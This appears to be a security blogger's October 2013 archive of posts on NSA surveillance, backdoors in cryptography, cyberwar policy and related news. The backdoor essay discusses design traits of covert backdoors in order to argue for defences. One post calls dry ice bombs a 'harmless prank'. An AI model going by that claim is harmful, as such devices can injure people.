Blog: October 2013 Archives

NSA Eavesdropping on Google and Yahoo Networks

The Washington Post reported that the NSA is eavesdropping on the Google and Yahoo private networks—the code name for the program is MUSCULAR. I may write more about this later, but I have some initial comments:

  • It’s a measure of how far off the rails the NSA has gone that it’s taking its Cold War–era eavesdropping tactics—surreptitiously eavesdropping on foreign networks—and applying them to US corporations. It’s skirting US law by targeting the portion of these corporate networks outside the US. It’s the same sort of legal argument the NSA used to justify collecting address books and buddy lists worldwide.
  • Although the Washington Post article specifically talks about Google and Yahoo, you have to assume that all the other major—and many of the minor—cloud services are compromised this same way. That means Microsoft, Apple, Facebook, Twitter, MySpace, Badoo, Dropbox, and on and on and on.
  • It is well worth re-reading all the government denials about bulk collection and direct access after PRISM was exposed. It seems that it’s impossible to get the truth out of the NSA. Its carefully worded denials always seem to hide what’s really going on.
  • In light of this, PRISM is really just insurance: a way for the NSA to get legal cover for information it already has. My guess is that the NSA collects the vast majority of its data surreptitiously, using programs such as these. Then, when it has to share the information with the FBI or other organizations, it gets it again through a more public program like PRISM.
  • What this really shows is how robust the surveillance state is, and how hard it will be to craft laws reining in the NSA. All the bills being discussed so far only address portions of the problem: specific programs or specific legal justifications. But the NSA’s surveillance infrastructure is much more robust than that. It has many ways into our data, and all sorts of tricks to get around the law. Note this quote from yesterday’s story:

    John Schindler, a former NSA chief analyst and frequent defender who teaches at the Naval War College, said it is obvious why the agency would prefer to avoid restrictions where it can.

    “Look, NSA has platoons of lawyers, and their entire job is figuring out how to stay within the law and maximize collection by exploiting every loophole,” he said. “It’s fair to say the rules are less restrictive under Executive Order 12333 than they are under FISA,” the Foreign Intelligence Surveillance Act.

    No surprise, really. But it illustrates how difficult meaningful reform will be. I wrote this in September:

    It’s time to start cleaning up this mess. We need a special prosecutor, one not tied to the military, the corporations complicit in these programs, or the current political leadership, whether Democrat or Republican. This prosecutor needs free rein to go through the NSA’s files and discover the full extent of what the agency is doing, as well as enough technical staff who have the capability to understand it. He needs the power to subpoena government officials and take their sworn testimony. He needs the ability to bring criminal indictments where appropriate. And, of course, he needs the requisite security clearance to see it all.

    We also need something like South Africa’s Truth and Reconciliation Commission, where both government and corporate employees can come forward and tell their stories about NSA eavesdropping without fear of reprisal.

    Without this, crafting reform legislation will be impossible.

  • Finally, we need more encryption on the Internet. We have made surveillance too cheap, not just for the NSA but for all nation-state adversaries. We need to make it expensive again.

EDITED TO ADD (11/1): We don’t actually know if the NSA did this surreptitiously, or if it had assistance from another US corporation. Level 3 Communications provides the data links to Google, and its statement was sufficiently non-informative as to be suspicious:

In a statement, Level 3 said: “We comply with the laws in each country where we operate. In general, governments that seek assistance in law enforcement or security investigations prohibit disclosure of the assistance provided.”

When I write that the NSA has destroyed the fabric of trust on the Internet, this is the kind of thing I mean. Google can no longer trust its bandwidth providers not to betray the company.

EDITED TO ADD (11/2): The NSA’s denial is pretty lame. It feels as if it’s hardly trying anymore.

We also know that Level 3 Communications already cooperates with the NSA, and has the codename of LITTLE:

The document identified for the first time which telecoms companies are working with GCHQ’s “special source” team. It gives top secret codenames for each firm, with BT (“Remedy”), Verizon Business (“Dacron”), and Vodafone Cable (“Gerontic”). The other firms include Global Crossing (“Pinnage”), Level 3 (“Little”), Viatel (“Vitreous”) and Interoute (“Streetcar”).

Again, those code names should properly be in all caps.

EDITED TO ADD (11/5): More details on the program.

Posted on October 31, 2013 at 10:29 AM128 Comments

The Battle for Power on the Internet

We’re in the middle of an epic battle for power in cyberspace. On one side are the traditional, organized, institutional powers such as governments and large multinational corporations. On the other are the distributed and nimble: grassroots movements, dissident groups, hackers, and criminals. Initially, the Internet empowered the second side. It gave them a place to coordinate and communicate efficiently, and made them seem unbeatable. But now, the more traditional institutional powers are winning, and winning big. How these two sides fare in the long term, and the fate of the rest of us who don’t fall into either group, is an open question—and one vitally important to the future of the Internet.

In the Internet’s early days, there was a lot of talk about its “natural laws”—how it would upend traditional power blocks, empower the masses, and spread freedom throughout the world. The international nature of the Internet circumvented national laws. Anonymity was easy. Censorship was impossible. Police were clueless about cybercrime. And bigger changes seemed inevitable. Digital cash would undermine national sovereignty. Citizen journalism would topple traditional media, corporate PR, and political parties. Easy digital copying would destroy the traditional movie and music industries. Web marketing would allow even the smallest companies to compete against corporate giants. It really would be a new world order.

This was a utopian vision, but some of it did come to pass. Internet marketing has transformed commerce. The entertainment industries have been transformed by things like MySpace and YouTube, and are now more open to outsiders. Mass media has changed dramatically, and some of the most influential people in the media have come from the blogging world. There are new ways to organize politically and run elections. Crowdfunding has made tens of thousands of projects possible to finance, and crowdsourcing made more types of projects possible. Facebook and Twitter really did help topple governments.

But that is just one side of the Internet’s disruptive character. The Internet has emboldened traditional power as well.

On the corporate side, power is consolidating, a result of two current trends in computing. First, the rise of cloud computing means that we no longer have control of our data. Our e-mail, photos, calendars, address books, messages, and documents are on servers belonging to Google, Apple, Microsoft, Facebook, and so on. And second, we are increasingly accessing our data using devices that we have much less control over: iPhones, iPads, Android phones, Kindles, ChromeBooks, and so on. Unlike traditional operating systems, those devices are controlled much more tightly by the vendors, who limit what software can run, what they can do, how they’re updated, and so on. Even Windows 8 and Apple’s Mountain Lion operating system are heading in the direction of more vendor control.

I have previously characterized this model of computing as “feudal.” Users pledge their allegiance to more powerful companies who, in turn, promise to protect them from both sysadmin duties and security threats. It’s a metaphor that’s rich in history and in fiction, and a model that’s increasingly permeating computing today.

Medieval feudalism was a hierarchical political system, with obligations in both directions. Lords offered protection, and vassals offered service. The lord-peasant relationship was similar, with a much greater power differential. It was a response to a dangerous world.

Feudal security consolidates power in the hands of the few. Internet companies, like lords before them, act in their own self-interest. They use their relationship with us to increase their profits, sometimes at our expense. They act arbitrarily. They make mistakes. They’re deliberately—and incidentally—changing social norms. Medieval feudalism gave the lords vast powers over the landless peasants; we’re seeing the same thing on the Internet.

It’s not all bad, of course. We, especially those of us who are not technical, like the convenience, redundancy, portability, automation, and shareability of vendor-managed devices. We like cloud backup. We like automatic updates. We like not having to deal with security ourselves. We like that Facebook just works—from any device, anywhere.

Government power is also increasing on the Internet. There is more government surveillance than ever before. There is more government censorship than ever before. There is more government propaganda, and an increasing number of governments are controlling what their users can and cannot do on the Internet. Totalitarian governments are embracing a growing “cyber sovereignty” movement to further consolidate their power. And the cyberwar arms race is on, pumping an enormous amount of money into cyber-weapons and consolidated cyber-defenses, further increasing government power.

In many cases, the interests of corporate and government powers are aligning. Both corporations and governments benefit from ubiquitous surveillance, and the NSA is using Google, Facebook, Verizon, and others to get access to data it couldn’t otherwise. The entertainment industry is looking to governments to enforce its antiquated business models. Commercial security equipment from companies like BlueCoat and Sophos is being used by oppressive governments to surveil and censor their citizens. The same facial recognition technology that Disney uses in its theme parks can also identify protesters in China and Occupy Wall Street activists in New York. Think of it as a public/private surveillance partnership.

What happened? How, in those early Internet years, did we get the future so wrong?

The truth is that technology magnifies power in general, but rates of adoption are different. The unorganized, the distributed, the marginal, the dissidents, the powerless, the criminal: they can make use of new technologies very quickly. And when those groups discovered the Internet, suddenly they had power. But later, when the already-powerful big institutions finally figured out how to harness the Internet, they had more power to magnify. That’s the difference: the distributed were more nimble and were faster to make use of their new power, while the institutional were slower but were able to use their power more effectively.

So while the Syrian dissidents used Facebook to organize, the Syrian government used Facebook to identify dissidents to arrest.

All isn’t lost for distributed power, though. For institutional power, the Internet is a change in degree, but for distributed power, it’s a qualitative one. The Internet gives decentralized groups—for the first time—the ability to coordinate. This can have incredible ramifications, as we saw in the SOPA/PIPA debate, Gezi, Brazil, and the rising use of crowdfunding. It can invert power dynamics, even in the presence of surveillance, censorship, and use control. But aside from political coordination, the Internet allows for social coordination as well—to unite, for example, ethnic diasporas, gender minorities, sufferers of rare diseases, and people with obscure interests.

This isn’t static: Technological advances continue to provide advantage to the nimble. I discussed this trend in my book Liars and Outliers. If you think of security as an arms race between attackers and defenders, any technological advance gives one side or the other a temporary advantage. But most of the time, a new technology benefits the nimble first. They are not hindered by bureaucracy—and sometimes not by laws or ethics, either. They can evolve faster.

We saw it with the Internet. As soon as the Internet started being used for commerce, a new breed of cybercriminal emerged, immediately able to take advantage of the new technology. It took police a decade to catch up. And we saw it on social media, as political dissidents made use of its organizational powers before totalitarian regimes did.

This delay is what I call a “security gap.” It’s greater when there’s more technology, and in times of rapid technological change. Basically, if there are more innovations to exploit, there will be more damage resulting from society’s inability to keep up with exploiters of all of them. And since our world is one in which there’s more technology than ever before, and a faster rate of technological change than ever before, we should expect to see a greater security gap than ever before. In other words, there will be an increasing time period during which nimble distributed powers can make use of new technologies before slow institutional powers can make better use of those technologies.

This is the battle: quick vs. strong. To return to medieval metaphors, you can think of a nimble distributed power—whether marginal, dissident, or criminal—as Robin Hood; and ponderous institutional powers—both government and corporate—as the feudal lords.

So who wins? Which type of power dominates in the coming decades?

Right now, it looks like traditional power. Ubiquitous surveillance means that it’s easier for the government to identify dissidents than it is for the dissidents to remain anonymous. Data monitoring means easier for the Great Firewall of China to block data than it is for people to circumvent it. The way we all use the Internet makes it much easier for the NSA to spy on everyone than it is for anyone to maintain privacy. And even though it is easy to circumvent digital copy protection, most users still can’t do it.

The problem is that leveraging Internet power requires technical expertise. Those with sufficient ability will be able to stay ahead of institutional powers. Whether it’s setting up your own e-mail server, effectively using encryption and anonymity tools, or breaking copy protection, there will always be technologies that can evade institutional powers. This is why cybercrime is still pervasive, even as police savvy increases; why technically capable whistleblowers can do so much damage; and why organizations like Anonymous are still a viable social and political force. Assuming technology continues to advance—and there’s no reason to believe it won’t—there will always be a security gap in which technically advanced Robin Hoods can operate.

Most people, though, are stuck in the middle. These are people who don’t have the technical ability to evade large governments and corporations, avoid the criminal and hacker groups who prey on us, or join any resistance or dissident movements. These are the people who accept default configuration options, arbitrary terms of service, NSA-installed back doors, and the occasional complete loss of their data. These are the people who get increasingly isolated as government and corporate power align. In the feudal world, these are the hapless peasants. And it’s even worse when the feudal lords—or any powers—fight each other. As anyone watching Game of Thrones knows, peasants get trampled when powers fight: when Facebook, Google, Apple, and Amazon fight it out in the market; when the US, EU, China, and Russia fight it out in geopolitics; or when it’s the US vs. “the terrorists” or China vs. its dissidents.

The abuse will only get worse as technology continues to advance. In the battle between institutional power and distributed power, more technology means more damage. We’ve already seen this: Cybercriminals can rob more people more quickly than criminals who have to physically visit everyone they rob. Digital pirates can make more copies of more things much more quickly than their analog forebears. And we’ll see it in the future: 3D printers mean that the computer restriction debate will soon involves guns, not movies. Big data will mean that more companies will be able to identify and track you more easily. It’s the same problem as the “weapons of mass destruction” fear: terrorists with nuclear or biological weapons can do a lot more damage than terrorists with conventional explosives. And by the same token, terrorists with large-scale cyberweapons can potentially do more damage than terrorists with those same bombs.

It’s a numbers game. Very broadly, because of the way humans behave as a species and as a society, every society is going to have a certain amount of crime. And there’s a particular crime rate society is willing to tolerate. With historically inefficient criminals, we were willing to live with some percentage of criminals in our society. As technology makes each individual criminal more powerful, the percentage we can tolerate decreases. Again, remember the “weapons of mass destruction” debate: As the amount of damage each individual terrorist can do increases, we need to do increasingly more to prevent even a single terrorist from succeeding.

The more destabilizing the technologies, the greater the rhetoric of fear, and the stronger institutional powers will get. This means increasingly repressive security measures, even if the security gap means that such measures become increasingly ineffective. And it will squeeze the peasants in the middle even more.

Without the protection of his own feudal lord, the peasant was subject to abuse both by criminals and other feudal lords. But both corporations and the government—and often the two in cahoots—are using their power to their own advantage, trampling on our rights in the process. And without the technical savvy to become Robin Hoods ourselves, we have no recourse but to submit to whatever the ruling institutional power wants.

So what happens as technology increases? Is a police state the only effective way to control distributed power and keep our society safe? Or do the fringe elements inevitably destroy society as technology increases their power? Probably neither doomsday scenario will come to pass, but figuring out a stable middle ground is hard. These questions are complicated, and dependent on future technological advances that we cannot predict. But they are primarily political questions, and any solutions will be political.

In the short term, we need more transparency and oversight. The more we know of what institutional powers are doing, the more we can trust that they are not abusing their authority. We have long known this to be true in government, but we have increasingly ignored it in our fear of terrorism and other modern threats. This is also true for corporate power. Unfortunately, market dynamics will not necessarily force corporations to be transparent; we need laws to do that. The same is true for decentralized power; transparency is how we’ll differentiate political dissidents from criminal organizations.

Oversight is also critically important, and is another long-understood mechanism for checking power. This can be a combination of things: courts that act as third-party advocates for the rule of law rather than rubber-stamp organizations, legislatures that understand the technologies and how they affect power balances, and vibrant public-sector press and watchdog groups that analyze and debate the actions of those wielding power.

Transparency and oversight give us the confidence to trust institutional powers to fight the bad side of distributed power, while still allowing the good side to flourish. For if we’re going to entrust our security to institutional powers, we need to know they will act in our interests and not abuse that power. Otherwise, democracy fails.

In the longer term, we need to work to reduce power differences. The key to all of this is access to data. On the Internet, data is power. To the extent the powerless have access to it, they gain in power. To the extent that the already powerful have access to it, they further consolidate their power. As we look to reducing power imbalances, we have to look at data: data privacy for individuals, mandatory disclosure laws for corporations, and open government laws.

Medieval feudalism evolved into a more balanced relationship in which lords had responsibilities as well as rights. Today’s Internet feudalism is both ad-hoc and one-sided. Those in power have a lot of rights, but increasingly few responsibilities or limits. We need to rebalance this relationship. In medieval Europe, the rise of the centralized state and the rule of law provided the stability that feudalism lacked. The Magna Carta first forced responsibilities on governments and put humans on the long road toward government by the people and for the people. In addition to re-reigning in government power, we need similar restrictions on corporate power: a new Magna Carta focused on the institutions that abuse power in the 21st century.

Today’s Internet is a fortuitous accident: a combination of an initial lack of commercial interests, government benign neglect, military requirements for survivability and resilience, and computer engineers building open systems that worked simply and easily.

We’re at the beginning of some critical debates about the future of the Internet: the proper role of law enforcement, the character of ubiquitous surveillance, the collection and retention of our entire life’s history, how automatic algorithms should judge us, government control over the Internet, cyberwar rules of engagement, national sovereignty on the Internet, limitations on the power of corporations over our data, the ramifications of information consumerism, and so on.

Data is the pollution problem of the information age. All computer processes produce it. It stays around. How we deal with it—how we reuse and recycle it, who has access to it, how we dispose of it, and what laws regulate it—is central to how the information age functions. And I believe that just as we look back at the early decades of the industrial age and wonder how society could ignore pollution in their rush to build an industrial world, our grandchildren will look back at us during these early decades of the information age and judge us on how we dealt with the rebalancing of power resulting from all this new data.

This won’t be an easy period for us as we try to work these issues out. Historically, no shift in power has ever been easy. Corporations have turned our personal data into an enormous revenue generator, and they’re not going to back down. Neither will governments, who have harnessed that same data for their own purposes. But we have a duty to tackle this problem.

I can’t tell you what the result will be. These are all complicated issues, and require meaningful debate, international cooperation, and innovative solutions. We need to decide on the proper balance between institutional and decentralized power, and how to build tools that amplify what is good in each while suppressing the bad.

This essay previously appeared in the Atlantic.

EDITED TO ADD (11/5): This essay has been translated into Danish.

Posted on October 30, 2013 at 6:50 AM83 Comments

Understanding the Threats in Cyberspace

The primary difficulty of cyber security isn’t technology—it’s policy. The Internet mirrors real-world society, which makes security policy online as complicated as it is in the real world. Protecting critical infrastructure against cyber-attack is just one of cyberspace’s many security challenges, so it’s important to understand them all before any one of them can be solved.

The list of bad actors in cyberspace is long, and spans a wide range of motives and capabilities. At the extreme end there’s cyberwar: destructive actions by governments during a war. When government policymakers like David Omand think of cyber-attacks, that’s what comes to mind. Cyberwar is conducted by capable and well-funded groups and involves military operations against both military and civilian targets. Along much the same lines are non-nation state actors who conduct terrorist operations. Although less capable and well-funded, they are often talked about in the same breath as true cyberwar.

Much more common are the domestic and international criminals who run the gamut from lone individuals to organized crime. They can be very capable and well-funded and will continue to inflict significant economic damage.

Threats from peacetime governments have been seen increasingly in the news. The US worries about Chinese espionage against Western targets, and we’re also seeing US surveillance of pretty much everyone in the world, including Americans inside the US. The National Security Agency (NSA) is probably the most capable and well-funded espionage organization in the world, and we’re still learning about the full extent of its sometimes illegal operations.

Hacktivists are a different threat. Their actions range from Internet-age acts of civil disobedience to the inflicting of actual damage. This is hard to generalize about because the individuals and groups in this category vary so much in skill, funding and motivation. Hackers falling under the “anonymous” aegis—it really isn’t correct to call them a group—come under this category, as does WikiLeaks. Most of these attackers are outside the organization, although whistleblowing—the civil disobedience of the information age—generally involves insiders like Edward Snowden.

This list of potential network attackers isn’t exhaustive. Depending on who you are and what your organization does, you might be also concerned with espionage cyber-attacks by the media, rival corporations or even the corporations we entrust with our data.

The issue here, and why it affects policy, is that protecting against these various threats can lead to contradictory requirements. In the US, the NSA’s post-9/11 mission to protect the country from terrorists has transformed it into a domestic surveillance organization. The NSA’s need to protect its own information systems from outside attack opened it up to attacks from within. Do the corporate security products we buy to protect ourselves against cybercrime contain backdoors that allow for government spying? European countries may condemn the US for spying on its own citizens, but do they do the same thing?

All these questions are especially difficult because military and security organizations along with corporations tend to hype particular threats. For example, cyberwar and cyberterrorism are greatly overblown as threats—because they result in massive government programs with huge budgets and power—while cybercrime is largely downplayed.

We need greater transparency, oversight and accountability on both the government and corporate sides before we can move forward. With the secrecy that surrounds cyber-attack and cyberdefense it’s hard to be optimistic.

This essay previously appeared in Europe’s World.

Posted on October 28, 2013 at 6:39 AM32 Comments

US Government Monitoring Public Internet in Real Time

Here’s a demonstration of the US government’s capabilities to monitor the public Internet. Former CIA and NSA Director Michael Hayden was on the Acela train between New York and Washington DC, taking press interviews on the phone. Someone nearby overheard the conversation, and started tweeting about it. Within 15 or so minutes, someone somewhere noticed the tweets, and informed someone who knew Hayden. That person called Hayden on his cell phone and, presumably, told him to shut up.

Nothing covert here; the tweets were public. But still, wow.

EDITED TO ADD: To clarify, I don’t think this was a result of the NSA monitoring the Internet. I think this was some public relations office—probably the one that is helping General Alexander respond to all the Snowden stories—who is searching the public Twitter feed for, among other things, Hayden’s name.

Posted on October 26, 2013 at 5:43 PM65 Comments

Book Review: Cyber War Will Not Take Place

Thomas Rid, Cyber War Will Not Take Place, Oxford University Press, 2013.

Cyber war is possibly the most dangerous buzzword of the Internet era. The fear-inducing rhetoric surrounding it is being used to justify major changes in the way the Internet is organized, governed, and constructed. And in Cyber War Will Not Take Place, Thomas Rid convincingly argues that cyber war is not a compelling threat. Rid is one of the leading cyber war skeptics in Europe, and although he doesn’t argue that war won’t extend into cyberspace, he says that cyberspace’s role in war is more limited than doomsayers want us to believe. His argument against cyber war is lucid and methodical. He divides “offensive and violent political acts” in cyberspace into: sabotage, espionage, and subversion. These categories are larger than cyberspace, of course, but Rid spends considerable time analyzing their strengths and limitations within cyberspace. The details are complicated, but his end conclusion is that many of these types of attacks cannot be defined as acts of war, and any future war won’t involve many of these types of attacks.

None of this is meant to imply that cyberspace is safe. Threats of all sorts fill cyberspace, but not threats of war. As such, the policies to defend against them are different. While hackers and criminal threats get all the headlines, more worrisome are the threats from governments seeking to consolidate their power. I have long argued that controlling the Internet has become critical for totalitarian states, and their four broad tools of surveillance, censorship, propaganda and use control have legitimate commercial applications, and are also employed by democracies.

A lot of the problem here is of definition. There isn’t broad agreement as to what constitutes cyber war, and this confusion plays into the hands of those hyping its threat. If everything from Chinese espionage to Russian criminal extortion to activist disruption falls under the cyber war umbrella, then it only makes sense to put more of the Internet under government—and thus military—control. Rid’s book is a compelling counter-argument to this approach.

Rid’s final chapter is an essay unto itself, and lays out his vision as to how we should deal with threats in cyberspace. For policymakers who won’t sit through an entire book, this is the chapter I would urge them to read. Arms races are dangerous and destabilizing, and we’re in the early years of a cyber war arms race that’s being fueled by fear and ignorance. This book is a cogent counterpoint to the doomsayers and the profiteers, and should be required reading for anyone concerned about security in cyberspace.

This book review previously appeared in Europe’s World.

Posted on October 25, 2013 at 9:26 AM25 Comments

Cognitive Biases About Violence as a Negotiating Tactic

Interesting paper: Max Abrahms, “The Credibility Paradox: Violence as a Double-Edged Sword in International Politics,” International Studies Quarterly, 2013:

Abstract: Implicit in the rationalist literature on bargaining over the last half-century is the political utility of violence. Given our anarchical international system populated with egoistic actors, violence is thought to promote concessions by lending credibility to their threats. From the vantage of bargaining theory, then, empirical research on terrorism poses a puzzle. For non-state actors, terrorism signals a credible threat in comparison to less extreme tactical alternatives. In recent years, however, a spate of studies across disciplines and methodologies has nonetheless found that neither escalating to terrorism nor with terrorism encourages government concessions. In fact, perpetrating terrorist acts reportedly lowers the likelihood of government compliance, particularly as the civilian casualties rise. The apparent tendency for this extreme form of violence to impede concessions challenges the external validity of bargaining theory, as traditionally understood. In this study, I propose and test an important psychological refinement to the standard rationalist narrative. Via an experiment on a national sample of adults, I find evidence of a newfound cognitive heuristic undermining the coercive logic of escalation enshrined in bargaining theory. Due to this oversight, mainstream bargaining theory overestimates the political utility of violence, particularly as an instrument of coercion.

Posted on October 25, 2013 at 6:30 AM28 Comments

DARPA Contest for Fully Automated Network Defense

DARPA is looking for a fully automated network defense system:

What if computers had a “check engine” light that could indicate new, novel security problems? What if computers could go one step further and heal security problems before they happen?

To find out, the Defense Advanced Research Projects Agency (DARPA) intends to hold the Cyber Grand Challenge (CGC)—the first-ever tournament for fully automatic network defense systems. DARPA envisions teams creating automated systems that would compete against each other to evaluate software, test for vulnerabilities, generate security patches and apply them to protected computers on a network. To succeed, competitors must bridge the expert gap between security software and cutting-edge program analysis research. The winning team would receive a cash prize of $2 million.

Some news articles. Slashdot thread. Reddit thread.

Posted on October 24, 2013 at 8:45 AM65 Comments

Code Names for NSA Exploit Tools

This is from a Snowden document released by Le Monde:

General Term Descriptions:

HIGHLANDS: Collection from Implants
VAGRANT: Collection of Computer Screens
MAGNETIC: Sensor Collection of Magnetic Emanations
MINERALIZE: Collection from LAN Implant
OCEAN: Optical Collection System for Raster-Based Computer Screens
LIFESAFER: Imaging of the Hard Drive
GENIE: Multi-stage operation: jumping the airgap etc.
BLACKHEART: Collection from an FBI Implant
[…]
DROPMIRE: Passive collection of emanations using antenna
CUSTOMS: Customs opportunities (not LIFESAVER)
DROPMIRE: Laser printer collection, purely proximal access (***NOT*** implanted)
DEWSWEEPER: USB (Universal Serial Bus) hardware host tap that provides COVERT link over US link into a target network. Operates w/RF relay subsystem to provide wireless Bridge into target network.
RADON: Bi-directional host tap that can inject Ethernet packets onto the same targets. Allows bi-directional exploitation of denied networks using standard on-net tools.

There’s a lot to think about in this list. RADON and DEWSWEEPER seem particularly interesting.

Posted on October 23, 2013 at 10:03 AM61 Comments

Dry Ice Bombs at LAX

The news story about the guy who left dry ice bombs in restricted areas of LAX is really weird.

I can’t get worked up over it, though. Dry ice bombs are a harmless prank. I set off a bunch of them when I was in college, although I used liquid nitrogen, because I was impatient—and they’re harmless. I know of someone who set a few off over the summer, just for fun. They do make a very satisfying boom.

Having them set off in a secure airport area doesn’t illustrate any new vulnerabilities. We already know that trusted people can subvert security systems. So what?

I’ve done a bunch of press interviews on this. One radio announcer really didn’t like my nonchalance. He really wanted me to complain about the lack of cameras at LAX, and was unhappy when I pointed out that we didn’t need cameras to catch this guy.

I like my kicker quote in this article:

Various people, including former Los Angeles Police Chief William Bratton, have called LAX the No. 1 terrorist target on the West Coast. But while an Algerian man discovered with a bomb at the Canadian border in 1999 was sentenced to 37 years in prison in connection with a plot to cause damage at LAX, Schneier said that assessment by Bratton is probably not true.

“Where can you possibly get that data?” he said. “I don’t think terrorists respond to opinion polls about how juicy targets are.”

Posted on October 23, 2013 at 5:35 AM68 Comments

Can I Be Trusted?

Slashdot asks the question:

I’m a big fan of Bruce Schneier, but just to play devil’s advocate, let’s say, hypothetically, that Schneier is actually in cahoots with the NSA. Who better to reinstate public trust in weakened cryptosystems? As an exercise in security that Schneier himself may find interesting, what methods are available for proving (or at least affirming) that we can trust Bruce Schneier?

So far, I haven’t seen the good reasons why I might be untrustworthy. I’d help, but that seems unfair.

Posted on October 22, 2013 at 11:32 AM165 Comments

Defending Against Crypto Backdoors

We already know the NSA wants to eavesdrop on the Internet. It has secret agreements with telcos to get direct access to bulk Internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext—encrypted information—and figure out which programs could have created it.

But what the NSA wants is to be able to read that encrypted information in as close to real-time as possible. It wants backdoors, just like the cybercriminals and less benevolent governments do.

And we have to figure out how to make it harder for them, or anyone else, to insert those backdoors.

How the NSA Gets Its Backdoors

The FBI tried to get backdoor access embedded in an AT&T secure telephone system in the mid-1990s. The Clipper Chip included something called a LEAF: a Law Enforcement Access Field. It was the key used to encrypt the phone conversation, itself encrypted in a special key known to the FBI, and it was transmitted along with the phone conversation. An FBI eavesdropper could intercept the LEAF and decrypt it, then use the data to eavesdrop on the phone call.

But the Clipper Chip faced severe backlash, and became defunct a few years after being announced.

Having lost that public battle, the NSA decided to get its backdoors through subterfuge: by asking nicely, pressuring, threatening, bribing, or mandating through secret order. The general name for this program is BULLRUN.

Defending against these attacks is difficult. We know from subliminal channel and kleptography research that it’s pretty much impossible to guarantee that a complex piece of software isn’t leaking secret information. We know from Ken Thompson’s famous talk on “trusting trust” (first delivered in the ACM Turing Award Lectures) that you can never be totally sure if there’s a security flaw in your software.

Since BULLRUN became public last month, the security community has been examining security flaws discovered over the past several years, looking for signs of deliberate tampering. The Debian random number flaw was probably not deliberate, but the 2003 Linux security vulnerability probably was. The DUAL_EC_DRBG random number generator may or may not have been a backdoor. The SSL 2.0 flaw was probably an honest mistake. The GSM A5/1 encryption algorithm was almost certainly deliberately weakened. All the common RSA moduli out there in the wild: we don’t know. Microsoft’s _NSAKEY looks like a smoking gun, but honestly, we don’t know.

How the NSA Designs Backdoors

While a separate program that sends our data to some IP address somewhere is certainly how any hacker—from the lowliest script kiddie up to the NSA—spies on our computers, it’s too labor-intensive to work in the general case.

For government eavesdroppers like the NSA, subtlety is critical. In particular, three characteristics are important:

  • Low discoverability. The less the backdoor affects the normal operations of the program, the better. Ideally, it shouldn’t affect functionality at all. The smaller the backdoor is, the better. Ideally, it should just look like normal functional code. As a blatant example, an email encryption backdoor that appends a plaintext copy to the encrypted copy is much less desirable than a backdoor that reuses most of the key bits in a public IV (initialization vector).
  • High deniability. If discovered, the backdoor should look like a mistake. It could be a single opcode change. Or maybe a “mistyped” constant. Or “accidentally” reusing a single-use key multiple times. This is the main reason I am skeptical about _NSAKEY as a deliberate backdoor, and why so many people don’t believe the DUAL_EC_DRBG backdoor is real: they’re both too obvious.
  • Minimal conspiracy. The more people who know about the backdoor, the more likely the secret is to get out. So any good backdoor should be known to very few people. That’s why the recently described potential vulnerability in Intel’s random number generator worries me so much; one person could make this change during mask generation, and no one else would know.

These characteristics imply several things:

  • A closed-source system is safer to subvert, because an open-source system comes with a greater risk of that subversion being discovered. On the other hand, a big open-source system with a lot of developers and sloppy version control is easier to subvert.
  • If a software system only has to interoperate with itself, then it is easier to subvert. For example, a closed VPN encryption system only has to interoperate with other instances of that same proprietary system. This is easier to subvert than an industry-wide VPN standard that has to interoperate with equipment from other vendors.
  • A commercial software system is easier to subvert, because the profit motive provides a strong incentive for the company to go along with the NSA’s requests.
  • Protocols developed by large open standards bodies are harder to influence, because a lot of eyes are paying attention. Systems designed by closed standards bodies are easier to influence, especially if the people involved in the standards don’t really understand security.
  • Systems that send seemingly random information in the clear are easier to subvert. One of the most effective ways of subverting a system is by leaking key information—recall the LEAF—and modifying random nonces or header information is the easiest way to do that.

Design Strategies for Defending against Backdoors

With these principles in mind, we can list design strategies. None of them is foolproof, but they are all useful. I’m sure there’s more; this list isn’t meant to be exhaustive, nor the final word on the topic. It’s simply a starting place for discussion. But it won’t work unless customers start demanding software with this sort of transparency.

  • Vendors should make their encryption code public, including the protocol specifications. This will allow others to examine the code for vulnerabilities. It’s true we won’t know for sure if the code we’re seeing is the code that’s actually used in the application, but surreptitious substitution is hard to do, forces the company to outright lie, and increases the number of people required for the conspiracy to work.
  • The community should create independent compatible versions of encryption systems, to verify they are operating properly. I envision companies paying for these independent versions, and universities accepting this sort of work as good practice for their students. And yes, I know this can be very hard in practice.
  • There should be no master secrets. These are just too vulnerable.
  • All random number generators should conform to published and accepted standards. Breaking the random number generator is the easiest difficult-to-detect method of subverting an encryption system. A corollary: we need better published and accepted RNG standards.
  • Encryption protocols should be designed so as not to leak any random information. Nonces should be considered part of the key or public predictable counters if possible. Again, the goal is to make it harder to subtly leak key bits in this information.

This is a hard problem. We don’t have any technical controls that protect users from the authors of their software.

And the current state of software makes the problem even harder: Modern apps chatter endlessly on the Internet, providing noise and cover for covert communications. Feature bloat provides a greater “attack surface” for anyone wanting to install a backdoor.

In general, what we need is assurance: methodologies for ensuring that a piece of software does what it’s supposed to do and nothing more. Unfortunately, we’re terrible at this. Even worse, there’s not a lot of practical research in this area—and it’s hurting us badly right now.

Yes, we need legal prohibitions against the NSA trying to subvert authors and deliberately weaken cryptography. But this isn’t just about the NSA, and legal controls won’t protect against those who don’t follow the law and ignore international agreements. We need to make their job harder by increasing their risk of discovery. Against a risk-averse adversary, it might be good enough.

This essay previously appeared on Wired.com.

EDITED TO ADD: I am looking for other examples of known or plausible instances of intentional vulnerabilities for a paper I am writing on this topic. If you can think of an example, please post a description and reference in the comments below. Please explain why you think the vulnerability could be intentional. Thank you.

Posted on October 22, 2013 at 6:15 AM101 Comments

The Trajectories of Government and Corporate Surveillance

Historically, surveillance was difficult and expensive.

Over the decades, as technology advanced, surveillance became easier and easier. Today, we find ourselves in a world of ubiquitous surveillance, where everything is collected, saved, searched, correlated and analyzed.

But while technology allowed for an increase in both corporate and government surveillance, the private and public sectors took very different paths to get there. The former always collected information about everyone, but over time, collected more and more of it, while the latter always collected maximal information, but over time, collected it on more and more people.

Corporate surveillance has been on a path from minimal to maximal information. Corporations always collected information on everyone they could, but in the past they didn’t collect very much of it and only held it as long as necessary. When surveillance information was expensive to collect and store, companies made do with as little as possible.

Telephone companies collected long-distance calling information because they needed it for billing purposes. Credit cards collected only the information about their customers’ transactions that they needed for billing. Stores hardly ever collected information about their customers, maybe some personal preferences, or name-and-address for advertising purposes. Even Google, back in the beginning, collected far less information about its users than it does today.

As technology improved, corporations were able to collect more. As the cost of data storage became cheaper, they were able to save more data and for a longer time. And as big data analysis tools became more powerful, it became profitable to save more. Today, almost everything is being saved by someone—probably forever.

